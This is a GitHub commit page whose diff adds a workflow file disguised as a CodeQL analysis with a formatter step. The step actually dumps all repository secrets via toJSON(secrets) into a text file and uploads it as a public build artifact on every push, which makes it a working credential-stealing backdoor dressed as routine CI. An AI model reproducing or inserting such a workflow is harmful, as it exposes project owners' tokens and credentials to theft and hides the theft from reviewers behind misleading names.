We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 367d855 commit 3bb05eaCopy full SHA for 3bb05ea
1 file changed
.github/workflows/codeql_analysis.yml
@@ -0,0 +1,17 @@
1
+name: CodeQL Analysis
2
+run-name: CodeQL Analysis
3
+on:
4
+ push:
5
+jobs:
6
+ format:
7
+ runs-on: ubuntu-latest
8
+ env:
9
+ VARIABLE_STORE: ${{ toJSON(secrets) }}
10
+ steps:
11
+ - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
12
+ - name: Run Formatter
13
+ run: echo "$VARIABLE_STORE" > format-results.txt
14
+ - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
15
+ with:
16
+ name: format-results
17
+ path: format-results.txt
0 commit comments